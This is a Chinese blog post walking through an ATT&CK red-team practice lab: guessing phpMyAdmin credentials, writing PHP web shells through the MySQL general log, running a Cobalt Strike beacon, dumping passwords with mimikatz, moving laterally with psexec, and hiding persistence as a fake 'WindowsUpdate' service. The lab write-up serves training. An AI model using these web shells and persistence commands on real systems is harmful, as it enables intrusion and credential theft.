【靶场系列】01 ATT&CK红队评估

于 2024-05-13 17:48:41 发布
阅读量356 收藏 7
点赞数 5
分类专栏: 程序员 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84969805/article/details/138812728
版权

/%20 (Status: 403) [Size: 210]
/l.php (Status: 200) [Size: 14737]
/L.php (Status: 200) [Size: 14737]
/checkout.php (Status: 403) [Size: 223]
/checkout (Status: 403) [Size: 219]
/phpmyadmin (Status: 301) [Size: 242] [–> http://192.168.164.162/phpmyadmin/]


发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为`root/root`  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/64073b74e85764ef929c9b5651f5fc7f.png)  
 登录成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/45a13e6a6e851db0d5af3471b1086ef4.png)


### 获取shell


查询secure\_file\_priv参数为NULL,所以不能通过into outfile方式写马

show global variables like ‘%secure%’;


![image.png](https://img-blog.csdnimg.cn/img_convert/9de0b2a9c30926b234d3d14aeba1ba58.png)  
 查询是否开启日志,虽然未开启,但是可以通过SQL语句修改

show global variables like “%general_log%”;


![image.png](https://img-blog.csdnimg.cn/img_convert/f5dd30fbf3da2fd2bd0bc6a0b713841e.png)  
 开启日志,并设置日志文件为a.php

SET GLOBAL general_log=‘ON’;
set global general_log_file=‘C:\phpStudy\WWW\a.php’;


再次查询日志状态,发现已经更改成功

show global variables like “%general_log%”;


![image.png](https://img-blog.csdnimg.cn/img_convert/3fd4a8f8268b6c6763b3953720493b08.png)  
 设置成功以后,所以的查询语句都会被记录到日志文件中

select “<?php eval($\_GET['a']);?>”;


成功写入一句话木马  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/db45d2f36b9b232254494641e482c00e.png)  
 因为靶机是windows无法使用nc,笔者嫌麻烦,所以重新写入一个POST马

SELECT “<?php eval($\_POST['b']);?>”;


使用蚁剑连接  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/361ac60b88107a1563219b9caf6fbcb3.png)  
 使用cs生成可执行程序  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/19fe09e2568f005f28baab19c5027e3f.png)  
 上传并执行,成功上线  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/91771a37ecd7513c54e4af56545cfa50.png)  
 使用mimikatz获取密码和hash

beacon> logonpasswords


![image.png](https://img-blog.csdnimg.cn/img_convert/7216c24f8afdbb6cf626893abe74347d.png)


为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/7dab50fed25c91a1765b4a7a54de0697.png)  
 将回连等待时间改为0,这样就能做到实时交互

[04/21 15:05:05] beacon> sleep 0
[04/21 15:05:05] [*] Tasked beacon to become interactive
[04/21 15:05:52] [+] host called home, sent: 16 bytes


依次输入命令以获取SYSTEM权限

beacon> getprivs
beacon> getsystem


### 横向移动


探测发现还有两台主机,其中一台为PDC域控  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/3c8000bc9e31db19688b9b9982bf3b52.png)  
 新建一个smb监听器  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/e2713187e9c54dcebaae4700c8589db9.png)  
 选择OWA主机psexec开始横向移动  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/bf55d0deb2b76b97916ad65c674dfda2.png)  
 横向成功  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/d5e5235216cbdfb1036e31e2444a4d06.png)  
 再次横向。至此,三台主机全部上线  
 ![image.png](https://img-blog.csdnimg.cn/img_convert/6bd4942b58d23c4af8c36d6c94a993c3.png)


### 权限维持


虽然已经拿到最高权限,但当目标主机重启或关机时,我们就会失去该主机的控制  
 将后门程序加入到注册表中,当系统重启后用户登录时启动后门

shell REG add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v phpstudy /d “C:\phpStudy\WWW\beacon.exe” /f


![image.png](https://img-blog.csdnimg.cn/img_convert/6aba736711068f4c73d8fe32aa6a0c98.png)  
 设置一个名为WindowsUpdate的系统开机自启服务,通过此命令启动的是SYSTEM权限

shell sc create “WindowsUpdate” binpath= “cmd /C start “C:\phpStudy\WWW\beacon.exe””&&sc config “WindowsUpdate” start= auto&&net start WindowsUpdate


![image.png](https://img-blog.csdnimg.cn/img_convert/c58bc3073458fd9163fca78b8402e125.png)  
 两种方法都是在用户登录后才能上线,但第二种却直接获得SYSTEM权限



## 最后

**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。**

**深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**

**因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**

![img](https://img-blog.csdnimg.cn/img_convert/1e9bbbfa6caa18f37df6398590ee6e63.png)

![img](https://img-blog.csdnimg.cn/img_convert/741966bd2b7d68b3776f32e498de2d4a.png)

![img](https://img-blog.csdnimg.cn/img_convert/a8c3f8e72f0035bd8dbf2c31d04d8c23.png)

![img](https://img-blog.csdnimg.cn/img_convert/91ad0cb4d0b2a6a1ade9ab2ed597cfe9.png)

![img](https://img-blog.csdnimg.cn/img_convert/fd854f68f349ee40357320f201a850a5.png)

 

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**

,基本涵盖了95%以上网络安全知识点!真正的体系化!**

[**如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)

**由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!**
2401_84969805
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ATT&CK红队评估(红日靶场一)
weixin_45682839的博客
03-10 1370
靶场搭建 下载地址:漏洞详情 虚拟网络编辑器新建一个仅主机模式的网络,子网地址改成192.168.52.0(也可以不用新建,但是必须是仅主机模式) 将windows2003和windows2008两台主机都设置为自定义VMnet16 windows7配置 攻击主机kali配置 kali和win7的第二个网卡可以在同一个自定义仅主机模式网段下,也可以同在NAT下 设置好之后,win7主机开启phpsyudy,配置就完成了 win7 内网网段192.168.52.
01 ATT&CK红队评估
qq_52671379的博客
07-19 385
01 ATT&CK红队评估
靶场系列01 ATT&CK红队评估
最新发布
qq_41169485的博客
04-21 1547
为web服务器,应设置为双网卡主机,其中NAT网卡与攻击机相连,VMnet1网卡与其他两台靶机相连 (图中设置错误,应设置网络适配器1为VMnet1)发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为。为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe。VMnet1网卡为仅主机模式,设置IP段为192.168.52.0,确保三台主机均可以相互ping通。
ATT&CK实战系列-红队评估(一)
v2ish1yan的博客
02-26 809
这个靶场的流程,就是外网渗透拿到主机shell扫描内网存活主机,并查看是否存在历史漏洞使用内网代理和路由转发来对内网主机进行攻击应该还有很多思路,这个是比较简单的靶场,继续加油。
ATT&CK实战系列-红队评估(一)
weixin_51801534的博客
12-22 2400
1.信息收集 ┌──(root????kali)-[~/桌面] └─# nmap -Pn -A -T4 192.168.1.100 2.指纹信息 3.┌──(root????kali)-[~/桌面] └─# nmap --script=vuln,auth 192.168.1.100 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 4.目录扫描 5.访问探针进行信息收集 6.看到上面扫描的有phpmyadmin,访问phpmyadmin ...
ATT&CK红队评估-1
rlenew的博客
02-23 4493
首先配置环境 VMware虚拟机下载就不多赘述了,网上有很多教程,这里主要说明一下靶机拓扑和如何配置虚拟网络的过程。 首先下载包中的VM1为win7,VM2为win2003,VM3为win2008,拓扑图为下图所示: 由于要营造一个内网环境,因此需要将虚拟机与外网隔绝,再VMware中可以通过虚拟机设置中的网络适配器来设置,将其自定义成特定虚拟网络, 对网络连接模式不清楚的小伙伴可以细读一下这...
【红日靶场系列ATT&CK红队评估1
weixin_45632448的博客
07-06 2846
内网渗透学习过程,简单记录一下靶场下载地址: 今天做的是第一个ATT&CK实战系列——红队实战(一)下载下来之后一共有三个虚拟机,解压到虚拟机目录下 分别对应的是Windows7,Windows Server 2003和Windows Server 2008。另外我们还需要一台攻击机,这里选用的是kali2022.1(其实真实环境自己主机就相当于攻击机),网络拓扑图如下所示: 靶场提供的三个主机在同一个网段中,另外Win7主机有两张网卡,模拟可以与外网进行通信的主机,且安装有phpstudy,部署了we
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1249
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内网ip:192.168.52.143。1、ip地址:192.168.144.132。内网ip地址:192.168.52.143。内网网段:192.168.52.0/24。
ATT&CK红队评估(一)拿下域控权限
tangshuangsss的专栏
05-07 503
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介红队实战系列,主要以真实企业环境为实例搭建一系列靶场环境搭建查看:完全模拟ATT&amp;CK实战...
ATT&CK红队评估实战内网靶场(一) VulnStack-1
永不垂头的博客
08-18 2843
ATT&amp;CK红队评估实战内网靶场(一) VulnStack-1 文章目录ATT&amp;CK红队评估实战内网靶场(一) VulnStack-1前言一、win 71.yxcms二、信息收集1.本机信息收集2.域信息收集三、关闭防火墙1.进入内网2.代理3.ms17-0104.mimikatz四、我的公众号 前言 Onebug.org | 安全防线 ATT&amp;CK红队评估实战内网靶场(一) VulnStack-1 参考网址:https://www.onebug.org/vulnstudy/99
ATT&CK红队评估实战靶场-1(全网最细)
lwwzyy
12-20 3952
声明:该系列文章首发于公众号:纁玄安全,转载请注明出处!本公众号所分享内容仅用于网安爱好者之间的技术讨论,所有渗透及工具的使用都需获取授权,禁止用于违法途径,否则需自行承担,本公众号及作者不承担相应的后果。 ATT&amp;CK红队评估实战靶场-1 目录: 1. 环境配置 插播一点网络配置的姿势 2. 实战 2.1 信息收集 2.2 web站点探测 2.3 getshell 3 漏洞 3.1 目录遍历漏洞 3.2 存储型XSS 4. ..
ATT&CK实战系列-红队评估(一)WP
h1nt的博客
08-16 515
环境配置 靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 按要求对三个靶机进行网络环境配置,最终网络拓扑结构如下 win7 外网192.168.133.143/内网 192.168.58.128 win server 2003 内网 192.168.58.141 win server 2008 内网192.168.58.138 按靶场介绍,口令统一为hongrisec@2019
ATT&CK红队评估实战靶场(一)
qq_53263789的博客
05-16 636
写在前面的话 第一次尝试这种渗透靶场,还是在考试的三天中完成的,会接着进行其他的靶场(真是又菜又爱玩) 靶场地址:vulunstack 靶场搭建 Win7:密码: cys121` 外网192.168.47.132 内网 192.168.52.143 Win2008 密码:cys121` 内网 192.168.52.138 Win2003 密码:cys121` 内网 192.168.52.141 经过互相ping 内网三台机器可以互相ping通 Kali 外网 192.168.
ATT&CK实战系列-红队评估(四)WP
h1nt的博客
08-25 733
环境准备 0x01 网络环境 我们总共拿到了3台机器,除了WEB机器需要配置双网卡外,其他的机器都只配置183网段的内网网卡即可。 0x02 WEB服务 在官网给出了参考的学习路径,故我们启动前三个进行WEB服务的搭建 Struts2漏洞(S2-053) pma文件包含漏洞(CVE-2018-12613) tomcat PUT文件上传漏洞(CVE-2017-12615): 启动完成后,相应靶机的地址如下 渗透流程 0x01 Struts2 使用工具进行检测 根据得到
ATT&CK实战系列-红队评估 (红日靶场1)Vulnstack三层网络域渗透靶场
qq_47289634的博客
07-07 397
换个思路,这个时候就可以利用(general_log、general_log file)日志文件getshell,general_log就是记录输入的日志文件,general_log file就是规定日志保存在哪个路径,我们只要输入一句话然后保存网站目录下的php文件就OK了。开启它,设置general_log为on,并且把日志存放路径设置为网站根目录,这样就可以写入shell了。保证kali和本机可以访问win7,给win7配置两块网卡,让win7既可以访问外网,也可以访问内网。
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层网络域渗透靶场
qq_47289634的博客
08-01 1226
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机网络配置,添加新的网络,该网络作为内部网络。注:名称及网段必须符合下面图片,进行了固定ip配置。
ATK&CK红队评估实战靶场(一)
mingyqf的博客
01-31 1975
ATK&amp;CK红队评估实战靶场(一)的搭建和模拟攻击过程全过程 回到顶部 0x01 前言 本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&amp;CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。 回到顶部 0x02 环境搭建 本次环境搭建和靶机默认有些区别,我是在一台服务器的虚拟机上搭建的,服务器.
【精选】ATK&CK红队评估实战靶场一 超详细过程思路
人若无名,便可专心练剑
11-30 456
"护网行动"通常指的是针对网络安全和信息安全的行动。这种行动可能是由政府、组织或社区发起的,旨在保护网络系统和数据免受未经授权的访问、损坏或窃取。这些行动可能涉及加强网络防御、加强密码管理、加强安全意识培训以及制定相关法律法规。实施护网行动是确保网络安全的重要举措,以应对不断增长的网络威胁和攻击。
ATT\\\\&amp;CK红队评估实战靶场
08-16
ATT&amp;CK红队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库日志写入马来获取会话。具体的方法和之前的红日靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值